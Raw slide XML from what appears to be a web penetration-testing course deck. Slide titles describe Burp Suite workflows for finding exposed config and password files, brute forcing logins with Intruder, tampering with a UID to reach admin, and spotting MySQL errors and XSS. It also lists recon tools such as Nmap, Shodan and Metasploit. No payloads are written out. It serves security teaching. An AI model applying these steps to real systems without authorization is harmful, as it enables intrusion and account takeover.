        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3035391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MyConfig.inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Burp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="myconfig_burp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316" t="7842" b="7690"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="740992" y="1240018"/>
            <a:ext cx="7662016" cy="4329342"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1189479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MyConfig.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Burp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="myconfig_burp2.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640" t="8468" b="16548"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="753826" y="1250708"/>
            <a:ext cx="7636357" cy="3843182"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="444869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Passwords</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="passwords_browser.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640" t="6304" b="14085"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="753826" y="1272087"/>
            <a:ext cx="7636357" cy="3800424"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="352995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Accounts.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="passwords_browser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110" t="5971" b="11960"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="626309" y="1242604"/>
            <a:ext cx="7891391" cy="4068526"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2517971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Accounts.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Burp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="passwords_burp.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287" t="8052" b="8523"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="779480" y="1250709"/>
            <a:ext cx="7585040" cy="4275896"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="274176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Passwords - Ed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="ed_Login_browser.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110" t="5971" b="11960"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="626309" y="1221001"/>
            <a:ext cx="7891391" cy="4068526"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1755486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 - Response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="ed_Login_browser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5604" b="10663"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="760236" y="1304159"/>
            <a:ext cx="7623528" cy="4115549"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2868966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History For Login</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="ed_Login_burp_proxy_history.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8259" b="16549"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="760236" y="1293468"/>
            <a:ext cx="7623528" cy="3853872"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20921930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 To Repeater</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="ed_Login_burp_send2_repeater.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640" t="8259" b="16549"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="753826" y="1314848"/>
            <a:ext cx="7636357" cy="3853872"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="890472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Information Gathering</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find user names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find email addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find name concatenations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find files for metadata scraping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fingerprint all server technologies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Database – MySQL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Postgres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MsSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Oracle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Server – IIS, Apache, Tomcat, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nginx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server Operating System – Windows, Linux, Mac</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12742790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Validate Good Response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="ed_Login_burp_repeater.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125" t="8468" b="16548"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="773065" y="1261398"/>
            <a:ext cx="7597870" cy="3843182"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31100064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Validate User John</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="ed_Login_burp_repeater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125" t="8676" b="16549"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="773065" y="1282778"/>
            <a:ext cx="7597870" cy="3832493"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3861586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Validate User Adrian</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="ed_Login_burp_repeater2.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964" t="7634" b="16549"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="766655" y="1282778"/>
            <a:ext cx="7610699" cy="3885942"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="312613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Validate User Admin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="ed_Login_burp_repeater3.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640" t="7842" b="13738"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="753826" y="1261399"/>
            <a:ext cx="7636357" cy="4019340"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6325762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to notes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="ed_Login_burp_repeater4_Notes.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478" t="8468" b="16548"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="747407" y="1293468"/>
            <a:ext cx="7649186" cy="3843182"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9798550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 - Spreadsheet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="notes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125" t="7646" b="15887"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="773065" y="1293468"/>
            <a:ext cx="7597870" cy="3843182"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4254325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Decode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="ed_Login_burp_decoder_url.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125" t="8677" b="26251"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="773065" y="1325537"/>
            <a:ext cx="7597870" cy="3335198"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3242199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Base64 Decode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="ed_Login_burp_decoder_url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125" t="8259" b="25835"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="773065" y="1304160"/>
            <a:ext cx="7597870" cy="3377957"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3032344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Base64 Decoded Results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 5" descr="ed_Login_burp_decoder_url3.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8259" b="16549"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="760236" y="1240018"/>
            <a:ext cx="7623528" cy="3853872"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3560517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 To Intruder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="ed_Login_burp_intruder.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640" t="8259" b="16549"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="753826" y="1282778"/>
            <a:ext cx="7636357" cy="3853872"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1255603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Passive Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dig </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DNSrecon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSL/TLS certificates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Google/Bing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dorking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shodan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wappalyzer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Firebug/Developer Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other search engine results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3017185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Intruder Target Tab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="ed_Login_burp_intruder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798" t="7555" b="14569"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="613480" y="1273566"/>
            <a:ext cx="7917049" cy="4144907"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31914726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Intruder Positions Tab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="ed_Login_burp_intruder2.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421" t="8581" b="14569"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="639134" y="1242382"/>
            <a:ext cx="7865732" cy="4090349"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14864521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Intruder Payload Tab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="ed_Login_burp_intruder3.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640" t="8051" b="16549"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="753826" y="1293468"/>
            <a:ext cx="7636357" cy="3864562"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40104387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Payload Setup Continued</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="ed_Login_burp_intruder4.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125" t="8468" b="13945"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="773065" y="1250708"/>
            <a:ext cx="7597870" cy="3976582"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20835035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Intruder Options Tab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="ed_Login_burp_intruder5.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642" t="7351" b="14569"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="607061" y="1227259"/>
            <a:ext cx="7929878" cy="4155819"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1532361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Intruder Results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 5" descr="ed_Login_burp_intruder6.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611" t="6674" b="1588"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="792309" y="1240015"/>
            <a:ext cx="7559382" cy="4190377"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2647707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Intercept</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="ed_Login_burp_intercept.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287" t="4922" b="16548"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="779480" y="1282773"/>
            <a:ext cx="7585040" cy="4024918"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24777942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Reload Current Page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="ed_Login_burp_intercept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5386" b="15118"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="760236" y="1282782"/>
            <a:ext cx="7623528" cy="3907321"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3732333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 UID</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="ed_Login_burp_intercept2.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478" t="8468" b="16548"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="747407" y="1357608"/>
            <a:ext cx="7649186" cy="3843182"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2134681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Admin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="ed_Login_burp_intercept3.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5385" b="1530"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="760236" y="1154500"/>
            <a:ext cx="7623528" cy="4575207"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3001959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 Passive Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Foca</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>theHarvester</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recon-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ng</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CeWL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Maltego</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27686023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A New User</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="register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125" t="5386" b="10446"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="773065" y="1229329"/>
            <a:ext cx="7597870" cy="4136928"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11850070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Error</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="register2.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964" t="6039" b="15118"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="766655" y="1282778"/>
            <a:ext cx="7610699" cy="3875252"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17514113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 MySQL Error</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="register3.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964" t="7634" b="18535"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="766655" y="1282780"/>
            <a:ext cx="7610699" cy="3784167"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21314768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XSS Vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="register4.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964" t="5822" b="15118"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="766655" y="1250708"/>
            <a:ext cx="7610699" cy="3885942"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
